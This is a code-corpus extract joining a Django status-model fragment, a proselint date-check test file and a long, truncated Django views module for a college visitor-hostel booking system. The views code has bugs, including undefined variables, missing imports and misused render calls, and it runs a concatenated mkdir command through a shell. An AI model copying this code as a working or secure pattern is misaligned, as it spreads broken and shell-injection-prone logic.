"""A model that represents a status at certain time.
This is an abstract class, every subclass must implement a status attribute,
it must implement also Foreignkey to the model that needs a status.
e.g.
# status = db.CharField(
max_length=64,
blank=True,
null=True,
default=STATUSES.CREATED,
choices=STATUSES.CHOICES)
# job = db.ForeignKey(Job, on_delete=db.CASCADE, related_name='statuses')
"""
STATUSES = None
uuid = models.UUIDField(
default=uuid.uuid4,
editable=False,
unique=True,
null=False)
created_at = models.DateTimeField(auto_now_add=True, db_index=True)
message = models.CharField(max_length=256, null=True, blank=True)
def __str__(self):
return '{} <{}>'.format(str(self), self.status)
class Meta:
verbose_name_plural = 'Statuses'
ordering = ['created_at']
abstract = True
class LastStatusMixin(object):
"""A mixin that extracts the logic of last_status.
This is an abstract class, every subclass must implement a status attribute,
as well as a last_status attribute:
e.g.
status = db.OneToOneField(
'ExperimentStatus',
related_name='+',
blank=True,
null=True,
editable=True,
on_delete=db.SET_NULL)
"""
STATUSES = None
@property
def last_status(self):
return self.status.status if self.status else None
@property
def is_running(self):
return self.STATUSES.is_running(self.last_status)
@property
def is_done(self):
return self.STATUSES.is_done(self.last_status)
@property
def failed(self):
return self.STATUSES.failed(self.last_status)
@property
def succeeded(self):
return self.STATUSES.succeeded(self.last_status)
@property
def stopped(self):
return self.STATUSES.stopped(self.last_status)
def set_status(self, status, message=None, **kwargs):
raise NotImplemented # noqa
| 25.411765 | 90 | 0.663263 |
4a1f42bfb6af3b37472ac44074549577cd4e3690 | 1,012 | py | Python | tests/test_garner_dates.py | ankita240796/proselint | 50d2a482df8f467737f9c958ace98ba152bec832 | [
"BSD-3-Clause"
] | 4,163 | 2015-10-03T07:37:21.000Z | 2022-03-31T03:52:32.000Z | tests/test_garner_dates.py | ankita240796/proselint | 50d2a482df8f467737f9c958ace98ba152bec832 | [
"BSD-3-Clause"
] | 878 | 2015-09-30T20:03:33.000Z | 2022-03-28T11:06:15.000Z | tests/test_garner_dates.py | ankita240796/proselint | 50d2a482df8f467737f9c958ace98ba152bec832 | [
"BSD-3-Clause"
] | 249 | 2015-10-04T12:21:27.000Z | 2022-02-28T22:13:11.000Z | """Test garner.dates."""
from proselint.checks.dates_times import dates
from .check import Check
class TestCheck(Check):
"""Test class for garner.dates."""
__test__ = True
def test_50s_hyphenation(self):
"""Find unneeded hyphen in 50's."""
text = """The 50's were swell."""
errors = dates.check_decade_apostrophes_short(text)
assert len(errors) == 1
def test_50_Cent_hyphenation(self):
"""Don't flag 50's when it refers to 50 Cent's manager."""
text = """
Dr. Dre suggested to 50's manager that he look into signing
Eminem to the G-Unit record label.
"""
errors = dates.check_decade_apostrophes_short(text)
assert len(errors) == 0
def test_dash_and_from(self):
"""Test garner.check_dash_and_from."""
text = """From 1999-2002, Sally served as chair of the committee."""
errors = dates.check_dash_and_from(text)
print(errors)
assert len(errors) == 1
| 29.764706 | 76 | 0.624506 |
4a1f42efdbf20f87fdb3bf6da8d13dfb1bdb1fcc | 41,264 | py | Python | FusionIIIT/applications/visitor_hostel/views.py | ssaksham9/Fusion | f1e405b457dba399411a2ddb79a9068746c05057 | [
"bzip2-1.0.6"
] | 2 | 2020-01-24T16:34:54.000Z | 2020-08-01T05:09:24.000Z | FusionIIIT/applications/visitor_hostel/views.py | ssaksham9/Fusion | f1e405b457dba399411a2ddb79a9068746c05057 | [
"bzip2-1.0.6"
] | null | null | null | FusionIIIT/applications/visitor_hostel/views.py | ssaksham9/Fusion | f1e405b457dba399411a2ddb79a9068746c05057 | [
"bzip2-1.0.6"
] | 5 | 2020-01-21T11:27:06.000Z | 2020-02-07T13:53:49.000Z | import datetime
from datetime import date
import xlrd
import os
from applications.visitor_hostel.models import RoomDetail
from django.contrib.auth.models import User
from django.contrib import messages
from django.contrib.auth import logout
from django.contrib.auth.decorators import login_required
from django.db.models import Q
from django.http import HttpResponseRedirect
from django.shortcuts import HttpResponse, get_object_or_404, redirect, render
from applications.globals.models import *
from applications.visitor_hostel.forms import *
from applications.visitor_hostel.models import *
import numpy as np
from .forms import InventoryForm
# for notifications
from notification.views import visitors_hostel_notif
# main page showing dashboard of user
@login_required(login_url='/accounts/login/')
def visitorhostel(request):
# intenders
intenders = User.objects.all()
user = request.user
# intender = request.user.holds_designations.filter(designation__name = 'Intender').exists()
vhcaretaker = request.user.holds_designations.filter(
designation__name='VhCaretaker').exists()
vhincharge = request.user.holds_designations.filter(
designation__name='VhIncharge').exists()
# finding designation of user
user_designation = "student"
if vhincharge:
user_designation = "VhIncharge"
elif vhcaretaker:
user_designation = "VhCaretaker"
else:
user_designation = "Intender"
available_rooms = {}
forwarded_rooms = {}
cancel_booking_request = []
# bookings for intender view
if (user_designation == "Intender"):
all_bookings = BookingDetail.objects.all().order_by('booking_from')
pending_bookings = BookingDetail.objects.filter(Q(status="Pending") | Q(status="Forward"), booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
active_bookings = BookingDetail.objects.filter(status="CheckedIn", booking_to__gte=datetime.datetime.today(), intender=user).select_related().order_by('booking_from')
dashboard_bookings = BookingDetail.objects.filter(Q(status = "Pending") | Q(status="Forward") | Q(status = "Confirmed") | Q(status = 'Rejected'), booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
# print(dashboard_bookings.booking_from)
visitors = {}
rooms = {}
for booking in active_bookings:
temp = range(2, booking.person_count + 1)
visitors[booking.id] = temp
for booking in active_bookings:
for room_no in booking.rooms.all():
temp2 = range(1, booking.number_of_rooms_alloted)
rooms[booking.id] = temp2
complete_bookings = BookingDetail.objects.filter(booking_to__lt=datetime.datetime.today(), intender=user).select_related().order_by('booking_from')
canceled_bookings = BookingDetail.objects.filter(status="Canceled", intender=user).select_related().order_by('booking_from')
rejected_bookings = BookingDetail.objects.filter(status='Rejected', intender=user).order_by('booking_from')
cancel_booking_requested = BookingDetail.objects.filter(status='CancelRequested', intender=user).order_by('booking_from')
else: # booking for caretaker and incharge view
all_bookings = BookingDetail.objects.all().order_by('booking_from')
pending_bookings = BookingDetail.objects.filter(Q(status="Pending") | Q(status="Forward"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
active_bookings = BookingDetail.objects.filter(Q(status="Confirmed") | Q(status="CheckedIn"), booking_to__gte=datetime.datetime.today()).select_related().order_by('booking_from')
cancel_booking_request = BookingDetail.objects.filter(status="CancelRequested", booking_to__gte=datetime.datetime.today()).order_by('booking_from')
dashboard_bookings = BookingDetail.objects.filter(Q(status = "Pending") | Q(status="Forward") | Q(status = "Confirmed"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
visitors = {}
rooms = {}
# x = BookingDetail.objects.all().annotate(rooms_count=Count('rooms'))
c_bookings = BookingDetail.objects.filter(Q(status="Forward"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
# number of visitors
for booking in active_bookings:
temp = range(2, booking.person_count + 1)
visitors[booking.id] = temp
# rooms alloted to booking
for booking in active_bookings:
for room_no in booking.rooms.all():
temp2 = range(2, booking.number_of_rooms_alloted + 1)
rooms[booking.id] = temp2
print(booking.rooms.all())
complete_bookings = BookingDetail.objects.filter(Q(status="Canceled") | Q(status="Complete"), booking_to__lt=datetime.datetime.today()).select_related().order_by('booking_from')
canceled_bookings = BookingDetail.objects.filter(status="Canceled").select_related().order_by('booking_from')
cancel_booking_requested = BookingDetail.objects.filter(status='CancelRequested', booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
rejected_bookings = BookingDetail.objects.filter(status='Rejected').order_by('booking_from')
# finding available room list for alloting rooms
for booking in pending_bookings:
booking_from = booking.booking_from
booking_to = booking.booking_to
temp1 = booking_details(booking_from, booking_to)
available_rooms[booking.id] = temp1
# forwarded rooms details
for booking in c_bookings:
booking_from = booking.booking_from
booking_to = booking.booking_to
temp2 = forwarded_booking_details(booking_from, booking_to)
forwarded_rooms[booking.id] = temp2
# inventory data
inventory = Inventory.objects.all()
inventory_bill = InventoryBill.objects.all()
# completed booking bills
completed_booking_bills = {}
all_bills = Bill.objects.select_related()
current_balance = 0
for bill in all_bills:
completed_booking_bills[bill.id] = {'intender': str(bill.booking.intender), 'booking_from': str(bill.booking.booking_from), 'booking_to': str(bill.booking.booking_to), 'total_bill': str(bill.meal_bill + bill.room_bill)}
current_balance = current_balance+bill.meal_bill + bill.room_bill
for inv_bill in inventory_bill:
current_balance = current_balance - inv_bill.cost
active_visitors = {}
for booking in active_bookings:
if booking.status == 'CheckedIn':
for visitor in booking.visitor.all():
active_visitors[booking.id] = visitor
# edit_room_statusForm=RoomStatus.objects.filter(Q(status="UnderMaintenance") | Q(status="Available"))
previous_visitors = VisitorDetail.objects.all()
# ------------------------------------------------------------------------------------------------------------------------------
bills = {}
for booking in active_bookings:
if booking.status == 'CheckedIn':
rooms = booking.rooms.all()
days = (datetime.date.today() - booking.check_in).days
category = booking.visitor_category
person = booking.person_count
room_bill = 0
if days == 0:
days = 1
if category == 'A':
room_bill = 0
elif category == 'B':
for i in rooms:
if i.room_type == 'SingleBed':
room_bill = room_bill+days*400
else:
room_bill = room_bill+days*500
elif category == 'C':
for i in rooms:
if i.room_type == 'SingleBed':
room_bill = room_bill+days*800
else:
room_bill = room_bill+days*1000
else:
for i in rooms:
if i.room_type == 'SingleBed':
room_bill = room_bill+days*1400
else:
room_bill = room_bill+days*1600
mess_bill = 0
for visitor in booking.visitor.all():
meal = MealRecord.objects.filter(visitor=visitor)
mess_bill1 = 0
for m in meal:
if m.morning_tea == True:
mess_bill1 = mess_bill1+10
if m.eve_tea == True:
mess_bill1 = mess_bill1+10
if m.breakfast == True:
mess_bill1 = mess_bill1+50
if m.lunch == True:
mess_bill1 = mess_bill1+100
if m.dinner == True:
mess_bill1 = mess_bill1+100
if mess_bill1 == 270:
mess_bill = mess_bill+225
else:
mess_bill = mess_bill + mess_bill1
total_bill = mess_bill + room_bill
bills[booking.id] = {'mess_bill': mess_bill,
'room_bill': room_bill, 'total_bill': total_bill}
# print(available_rooms)
# -------------------------------------------------------------------------------------------------------------------------------
visitor_list = []
for b in dashboard_bookings:
count=1
b_visitor_list = b.visitor.all()
for v in b_visitor_list:
if count == 1:
visitor_list.append(v)
count = count+1
return render(request, "vhModule/visitorhostel.html",
{'all_bookings': all_bookings,
'complete_bookings': complete_bookings,
'pending_bookings': pending_bookings,
'active_bookings': active_bookings,
'canceled_bookings': canceled_bookings,
'dashboard_bookings' : dashboard_bookings,
'bills': bills,
# 'all_rooms_status' : all_rooms_status,
'available_rooms': available_rooms,
'forwarded_rooms': forwarded_rooms,
# 'booked_rooms' : booked_rooms,
# 'under_maintainence_rooms' : under_maintainence_rooms,
# 'occupied_rooms' : occupied_rooms,
'inventory': inventory,
'inventory_bill': inventory_bill,
'active_visitors': active_visitors,
'intenders': intenders,
'user': user,
'visitors': visitors,
'rooms' : rooms,
# 'num_rooms' : list(range(1, booking.number_of_rooms_alloted+1)),
# 'num_rooms' :list(range(1, booking.number_of_rooms_alloted+1)),
'previous_visitors': previous_visitors,
'completed_booking_bills': completed_booking_bills,
'current_balance': current_balance,
'rejected_bookings': rejected_bookings,
'cancel_booking_request': cancel_booking_request,
'cancel_booking_requested' : cancel_booking_requested,
'user_designation': user_designation})
# Get methods for bookings
@login_required(login_url='/accounts/login/')
def get_booking_requests(request):
if request.method == 'POST':
pending_bookings = BookingDetail.objects.filter(status="Pending")
return render(request, "vhModule/visitorhostel.html", {'pending_bookings': pending_bookings})
else:
return HttpResponseRedirect('/visitorhostel/')
# getting active bookings
@login_required(login_url='/accounts/login/')
def get_active_bookings(request):
if request.method == 'POST':
active_bookings = BookingDetail.objects.filter(status="Confirmed")
return render_to_response(request, "vhModule/visitorhostel.html", {'active_bookings': active_bookings})
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def get_inactive_bookings(request):
if request.method == 'POST':
inactive_bookings = BookingDetail.objects.filter(
Q(status="Cancelled") | Q(status="Rejected") | Q(status="Complete"))
return render(request, "vhModule/visitorhostel.html", {'inactive_bookings': inactive_bookings})
else:
return HttpResponseRedirect('/visitorhostel/')
# Method for making booking request
@login_required(login_url='/accounts/login/')
def get_booking_form(request):
if request.method == 'POST':
intenders = User.objects.all()
return render(request, "vhModule/visitorhostel.html", {'intenders': intenders})
else:
return HttpResponseRedirect('/visitorhostel/')
# request booking form action view starts here
@login_required(login_url='/accounts/login/')
def request_booking(request):
if request.method == 'POST':
flag=0
# getting details from request form
intender = request.POST.get('intender')
user = User.objects.get(id=intender)
booking_id = "VH"+str(datetime.datetime.now())
category = request.POST.get('category')
person_count = request.POST.get('number-of-people')
bookingObject = []
if person_count and (int(person_count)<20):
person_count = person_count
else:
flag = 1 # for error
# person_count = 1
purpose_of_visit = request.POST.get('purpose-of-visit')
booking_from = request.POST.get('booking_from')
booking_to = request.POST.get('booking_to')
booking_from_time = request.POST.get('booking_from_time')
booking_to_time = request.POST.get('booking_to_time')
remarks_during_booking_request = request.POST.get('remarks_during_booking_request')
bill_to_be_settled_by = request.POST.get('bill_settlement')
number_of_rooms = request.POST.get('number-of-rooms')
if (int(person_count)<int(number_of_rooms)):
flag=1
if flag ==0:
bookingObject = BookingDetail.objects.create(purpose=purpose_of_visit,
intender=user,
booking_from=booking_from,
booking_to=booking_to,
visitor_category=category,
person_count=person_count,
arrival_time=booking_from_time,
departure_time=booking_to_time,
remark=remarks_during_booking_request,
number_of_rooms=number_of_rooms,
bill_to_be_settled_by=bill_to_be_settled_by)
print(bookingObject.bill_to_be_settled_by)
# in case of any attachment
doc = request.FILES.get('files-during-booking-request')
remark=remarks_during_booking_request,
if doc:
print("hello")
filename, file_extenstion = os.path.splitext(request.FILES.get('files-during-booking-request').booking_id)
filename = booking_id
full_path = settings.MEDIA_ROOT + "/VhImage/"
url = settings.MEDIA_URL + filename + file_extenstion
if not os.path.isdir(full_path):
cmd = "mkdir " + full_path
subprocess.call(cmd, shell=True)
fs = FileSystemStorage(full_path, url)
fs.save(filename + file_extenstion, doc)
uploaded_file_url = "/media/online_cms/" + filename
uploaded_file_url = uploaded_file_url + file_extenstion
bookingObject.image = uploaded_file_url
bookingObject.save()
# visitor datails from place request form
visitor_name = request.POST.get('name')
visitor_phone = request.POST.get('phone')
visitor_email = request.POST.get('email')
visitor_address = request.POST.get('address')
visitor_organization = request.POST.get('organization')
visitor_nationality = request.POST.get('nationality')
# visitor_nationality="jk"
if visitor_organization == '':
visitor_organization = ' '
visitor = VisitorDetail.objects.create(
visitor_phone=visitor_phone, visitor_name=visitor_name, visitor_email=visitor_email, visitor_address=visitor_address, visitor_organization=visitor_organization
, nationality=visitor_nationality
)
# try:
# bd = BookingDetail.objects.get(id=booking_id)
bookingObject.visitor.add(visitor)
bookingObject.save()
# except:
print("exception occured")
# return HttpResponse('/visitorhostel/')
# for sending notification of booking request to caretaker
caretaker_name = HoldsDesignation.objects.get(designation__name = "VhCaretaker")
visitors_hostel_notif(request.user, caretaker_name.user, 'booking_request')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# updating a booking request
@login_required(login_url='/accounts/login/')
def update_booking(request):
if request.method == 'POST':
user = request.user
print(request.POST)
booking_id = request.POST.get('booking-id')
category = request.POST.get('category')
person_count = request.POST.get('number-of-people')
bookingObject = []
if person_count:
person_count = person_count
else:
person_count = 1
purpose_of_visit = request.POST.get('purpose-of-visit')
booking_from = request.POST.get('booking_from')
booking_to = request.POST.get('booking_to')
number_of_rooms = request.POST.get('number-of-rooms')
# remark = request.POST.get('remark')
booking = BookingDetail.objects.get(id=booking_id)
booking.person_count = person_count
booking.number_of_rooms = number_of_rooms
booking.booking_from = booking_from
booking.booking_to = booking_to
booking.purpose = purpose_of_visit
booking.save()
# BookingDetail.objects.filter(id=booking_id).update(person_count=person_count,
# purpose=purpose_of_visit,
# booking_from=booking_from,
# booking_to=booking_to,
# number_of_rooms=number_of_rooms)
booking = BookingDetail.objects.get(id=booking_id)
c_bookings = BookingDetail.objects.filter(Q(status="Forward"), booking_to__gte=datetime.datetime.today()).order_by('booking_from')
for booking in c_bookings:
booking_from = booking.booking_from
booking_to = booking.booking_to
temp2 = forwarded_booking_details(booking_from, booking_to)
forwarded_rooms[booking.id] = temp2
return render(request, "visitorhostel/",
{
'forwarded_rooms': forwarded_rooms})
else:
return HttpResponseRedirect('/visitorhostel/')
# confirm booking by VhIncharge
@login_required(login_url='/accounts/login/')
def confirm_booking(request):
if request.method == 'POST':
booking_id = request.POST.get('booking-id')
intender = request.POST.get('intender'),
category = request.POST.get('category')
purpose = request.POST.get('purpose')
booking_from = request.POST.get('booking_from')
booking_to = request.POST.get('booking_to')
person_count = request.POST.get('numberofpeople')
# rooms list
rooms = request.POST.getlist('rooms[]')
print(rooms)
booking = BookingDetail.objects.get(id=booking_id)
bd = BookingDetail.objects.get(id=booking_id)
bd.status = 'Confirmed'
bd.category = category
for room in rooms:
room_object = RoomDetail.objects.get(room_number=room)
bd.rooms.add(room_object)
bd.save()
# notification of booking confirmation
visitors_hostel_notif(request.user, bd.intender, 'booking_confirmation')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def cancel_booking(request):
if request.method == 'POST':
user = request.user
print(request.POST)
booking_id = request.POST.get('booking-id')
remark = request.POST.get('remark')
charges = request.POST.get('charges')
BookingDetail.objects.filter(id=booking_id).update(
status='Canceled', remark=remark)
booking = BookingDetail.objects.get(id=booking_id)
# if no applicable charges then set charges to zero
x = 0
if charges:
Bill.objects.create(booking=booking, meal_bill=x, room_bill=int(charges), caretaker=user, payment_status=True)
else:
Bill.objects.create(booking=booking, meal_bill=x, room_bill=x, caretaker=user, payment_status=True)
complete_bookings = BookingDetail.objects.filter(Q(status="Canceled") | Q(status="Complete"), booking_to__lt=datetime.datetime.today()).select_related().order_by('booking_from')
# to notify the intender that his cancellation request has been confirmed
visitors_hostel_notif(request.user, booking.intender, 'booking_cancellation_request_accepted')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# cancel confirmed booing by intender
@login_required(login_url='/accounts/login/')
def cancel_booking_request(request):
if request.method == 'POST':
intender = request.user.holds_designations.filter(designation__name = 'VhIncharge')
booking_id = request.POST.get('booking-id')
remark = request.POST.get('remark')
BookingDetail.objects.filter(id=booking_id).update(status='CancelRequested', remark=remark)
incharge_name = HoldsDesignation.objects.get(designation__name = "VhIncharge")
# to notify the VhIncharge about a new cancelltaion request
visitors_hostel_notif(request.user, incharge_name.user, 'cancellation_request_placed')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# rehject a booking request
@login_required(login_url='/accounts/login/')
def reject_booking(request):
if request.method == 'POST':
booking_id = request.POST.get('booking-id')
remark = request.POST.get('remark')
BookingDetail.objects.filter(id=booking_id).update(
status="Rejected", remark=remark)
# to notify the intender that his request has been rejected
visitors_hostel_notif(request.user, booking.intender, 'booking_rejected')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# Guest check in view
@login_required(login_url='/accounts/login/')
def check_in(request):
if request.method == 'POST':
booking_id = request.POST.get('booking-id')
visitor_name = request.POST.get('name')
visitor_phone = request.POST.get('phone')
visitor_email = request.POST.get('email')
visitor_address = request.POST.get('address')
check_in_date = datetime.date.today()
# save visitors details
visitor = VisitorDetail.objects.create(
visitor_phone=visitor_phone, visitor_name=visitor_name, visitor_email=visitor_email, visitor_address=visitor_address)
try:
bd = BookingDetail.objects.get(id=booking_id)
bd.status = "CheckedIn"
bd.check_in = check_in_date
bd.visitor.add(visitor)
bd.save()
except:
return HttpResponse('/visitorhostel/')
return HttpResponse('/visitorhostel/')
else:
return HttpResponse('/visitorhostel/')
# guest check out view
@login_required(login_url='/accounts/login/')
def check_out(request):
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.all().filter(user=user)
if user:
if request.method == 'POST':
id = request.POST.get('id')
meal_bill = request.POST.get('mess_bill')
room_bill = request.POST.get('room_bill')
BookingDetail.objects.filter(id=id).update(
check_out=datetime.datetime.today(), status="Complete")
booking = BookingDetail.objects.get(id=id)
Bill.objects.create(booking=booking, meal_bill=int(meal_bill), room_bill=int(
room_bill), caretaker=user, payment_status=True)
# for visitors in visitor_info:
# meal=Meal.objects.all().filter(visitor=v_id).distinct()
# print(meal)
# for m in meal:
# mess_bill1=0
# if m.morning_tea==True:
# mess_bill1=mess_bill1+ m.persons*10
# print(mess_bill1)
# if m.eve_tea==True:
# mess_bill1=mess_bill1+m.persons*10
# if m.breakfast==True:
# mess_bill1=mess_bill1+m.persons*50
# if m.lunch==True:
# mess_bill1=mess_bill1+m.persons*100
# if m.dinner==True:
# mess_bill1=mess_bill1+m.persons*100
#
# if mess_bill1==m.persons*270:
# mess_bill=mess_bill+225*m.persons
# else:
# mess_bill=mess_bill + mess_bill1
# RoomStatus.objects.filter(book_room=book_room[0]).update(status="Available",book_room='')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def record_meal(request):
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.all().filter(user=user)
if user:
if request.method == "POST":
id = request.POST.get('pk')
booking_id = request.POST.get('booking')
booking = BookingDetail.objects.get(id=booking_id)
visitor = VisitorDetail.objects.get(id=id)
date_1 = datetime.datetime.today()
food = request.POST.getlist('food[]')
if '1' in food:
m_tea = True
else:
m_tea = False
if '4' in food:
e_tea = True
else:
e_tea = False
if '2' in food:
breakfast = True
else:
breakfast = False
if '3' in food:
lunch = True
else:
lunch = False
if '5' in food:
dinner = True
else:
dinner = False
if request.POST.get('numberofpeople'):
person = request.POST.get('numberofpeople')
else:
person = 1
try:
meal = MealRecord.objects.get(
visitor=visitor, booking=booking, meal_date=date_1)
except:
meal = False
if meal:
meal.morning_tea = m_tea
meal.eve_tea = e_tea
meal.breakfast = breakfast
meal.lunch = lunch
meal.dinner = dinner
meal.save()
else:
MealRecord.objects.create(visitor=visitor,
booking=booking,
morning_tea=m_tea,
eve_tea=e_tea,
meal_date=date_1,
breakfast=breakfast,
lunch=lunch,
dinner=dinner,
persons=person)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# generate bill records between date range
@login_required(login_url='/accounts/login/')
def bill_generation(request):
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.all().filter(user=user)
if user:
if request.method == 'POST':
v_id = request.POST.getlist('visitor')[0]
meal_bill = request.POST.getlist('mess_bill')[0]
room_bill = request.POST.getlist('room_bill')[0]
status = request.POST.getlist('status')[0]
if status == "True":
st = True
else:
st = False
user = get_object_or_404(User, username=request.user.username)
c = ExtraInfo.objects.filter(user=user)
visitor = Visitor.objects.filter(visitor_phone=v_id)
visitor = visitor[0]
visitor_bill = Visitor_bill.objects.create(
visitor=visitor, caretaker=user, meal_bill=meal_bill, room_bill=room_bill, payment_status=st)
messages.success(request, 'guest check out successfully')
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
# get available rooms list between date range
@login_required(login_url='/accounts/login/')
def room_availabity(request):
if request.method == 'POST':
date_1 = request.POST.get('start_date')
date_2 = request.POST.get('end_date')
available_rooms_list = []
available_rooms_bw_dates = booking_details(date_1, date_2)
print("Available rooms are ")
for room in available_rooms_bw_dates:
available_rooms_list.append(room.room_number)
available_rooms_array = np.asarray(available_rooms_list)
print(available_rooms_array)
return render(request, "vhModule/room-availability.html", {'available_rooms': available_rooms_array})
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def add_to_inventory(request):
if request.method == 'POST':
item_name = request.POST.get('item_name')
bill_number = request.POST.get('bill_number')
quantity = (request.POST.get('quantity'))
cost = request.POST.get('cost')
consumable = request.POST.get('consumable')
# if(Inventory.objects.get(item_name = item_name)):
# Inventory.objects.filter(item_name=item_name).update(quantity=quantity,consumable=consumable)
# else:
Inventory.objects.create(
item_name=item_name, quantity=quantity, consumable=consumable)
item_name_key = Inventory.objects.get(item_name=item_name)
InventoryBill.objects.create(
item_name=item_name_key, bill_number=bill_number, cost=cost)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def update_inventory(request):
if request.method == 'POST':
id = request.POST.get('id')
quantity = request.POST.get('quantity')
Inventory.objects.filter(id=id).update(quantity=quantity)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def edit_room_status(request):
if request.method == 'POST':
room_number = request.POST.get('room_number')
room_status = request.POST.get('room_status')
room = RoomDetail.objects.get(room_number=room_number)
RoomDetail.objects.filter(room_id=room).update(status=room_status)
return HttpResponseRedirect('/visitorhostel/')
else:
return HttpResponseRedirect('/visitorhostel/')
@login_required(login_url='/accounts/login/')
def bill_between_dates(request):
if request.method == 'POST':
date_1 = request.POST.get('start_date')
date_2 = request.POST.get('end_date')
bill_range_bw_dates = bill_range(date_1, date_2)
meal_total = 0
room_total = 0
individual_total =[]
# calculating room and mess bill booking wise
for i in bill_range_bw_dates:
meal_total = meal_total + i.meal_bill
room_total = room_total + i.room_bill
individual_total.append(i.meal_bill + i.room_bill)
total_bill = meal_total + room_total
# zip(bill_range_bw_dates, individual_total)
return render(request, "vhModule/booking_bw_dates.html", {
# 'booking_bw_dates': bill_range_bw_dates,
'booking_bw_dates_length': bill_range_bw_dates,
'meal_total' : meal_total,
'room_total' :room_total,
'total_bill' : total_bill,
'individual_total' : individual_total,
'booking_bw_dates': zip(bill_range_bw_dates, individual_total)
})
else:
return HttpResponseRedirect('/visitorhostel/')
def bill_range(date1,date2):
bookings = BookingDetail.objects.filter(Q(booking_from__lte=date1, booking_to__gte=date1) | Q(booking_from__gte=date1,
booking_to__lte=date2) | Q(booking_from__lte=date2, booking_to__gte=date2) | Q(booking_from__lte=date1, booking_to__gte=date1) | Q(booking_from__gte=date1, booking_to__lte=date2) | Q(booking_from__lte=date2, booking_to__gte=date2))
# bill_details = Bill.objects.filter(Q(booking__booking_from__lte=date1, booking__booking_to__gte=date1, booking__status="Confirmed") | Q(booking__booking_from__gte=date1,
# booking__booking_to__lte=date2, booking__status="Confirmed") | Q(booking__booking_from__lte=date2, booking__booking_to__gte=date2, status="Confirmed") | Q(booking_from__lte=date1, booking__booking_to__gte=date1, status="CheckedIn") | Q(booking__booking_from__gte=date1, booking__booking_to__lte=date2, booking__status="CheckedIn") | Q(booking__booking_from__lte=date2, booking__booking_to__gte=date2, booking__status="CheckedIn"))
bookings_bw_dates = []
booking_ids = []
for booking_id in bookings:
booking_ids.append(booking_id.id)
all_bill = Bill.objects.all().order_by('-id')
for b_id in booking_ids:
if Bill.objects.filter(booking__pk=b_id).exists() :
bill_id = Bill.objects.get(booking__pk=b_id)
bookings_bw_dates.append(bill_id)
return bookings_bw_dates
def booking_details(date1, date2):
bookings = BookingDetail.objects.filter(Q(booking_from__lte=date1, booking_to__gte=date1, status="Confirmed") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Confirmed") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Confirmed") | Q(booking_from__lte=date1, booking_to__gte=date1, status="Forward") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Forward") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Forward") | Q(booking_from__lte=date1, booking_to__gte=date1, status="CheckedIn") | Q(booking_from__gte=date1, booking_to__lte=date2, status="CheckedIn") | Q(booking_from__lte=date2, booking_to__gte=date2, status="CheckedIn"))
booked_rooms = []
for booking in bookings:
for room in booking.rooms.all():
booked_rooms.append(room)
available_rooms = []
all_rooms = RoomDetail.objects.all()
for room in all_rooms:
if room not in booked_rooms:
available_rooms.append(room)
return available_rooms
# function for finding forwarded booking rooms
def forwarded_booking_details(date1, date2):
bookings = BookingDetail.objects.filter(Q(booking_from__lte=date1, booking_to__gte=date1, status="Confirmed") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Confirmed") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Confirmed") | Q(booking_from__lte=date1, booking_to__gte=date1, status="CheckedIn") | Q(booking_from__gte=date1, booking_to__lte=date2, status="CheckedIn") | Q(booking_from__lte=date2, booking_to__gte=date2, status="CheckedIn"))
forwarded_bookings = BookingDetail.objects.filter(Q(booking_from__lte=date1, booking_to__gte=date1, status="Forward") | Q(booking_from__gte=date1,
booking_to__lte=date2, status="Forward") | Q(booking_from__lte=date2, booking_to__gte=date2, status="Forward") )
booked_rooms = []
# Bookings for rooms which are forwarded but not yet approved
forwarded_booking_rooms = []
for booking in forwarded_bookings:
for room in booking.rooms.all():
forwarded_booking_rooms.append(room)
return forwarded_booking_rooms
# View for forwarding booking - from VhCaretaker to VhIncharge
@login_required(login_url='/accounts/login/')
def forward_booking(request):
if request.method == 'POST':
user = request.user
booking_id = request.POST.get('id')
previous_category = request.POST.get('previous_category')
modified_category = request.POST.get('modified_category')
rooms = request.POST.getlist('rooms[]')
print(rooms)
BookingDetail.objects.filter(id=booking_id).update(status="Forward")
booking = BookingDetail.objects.get(id=booking_id)
bd = BookingDetail.objects.get(id=booking_id)
bd.modified_visitor_category = modified_category
count_rooms = 0
for room in rooms:
count_rooms = count_rooms + 1
room_object = RoomDetail.objects.get(room_number=room)
bd.rooms.add(room_object)
bd.number_of_rooms_alloted = count_rooms
bd.save()
dashboard_bookings = BookingDetail.objects.filter(Q(status = "Pending") | Q(status="Forward") | Q(status = "Confirmed") | Q(status = 'Rejected'), booking_to__gte=datetime.datetime.today(), intender=user).order_by('booking_from')
# return render(request, "vhModule/visitorhostel.html",
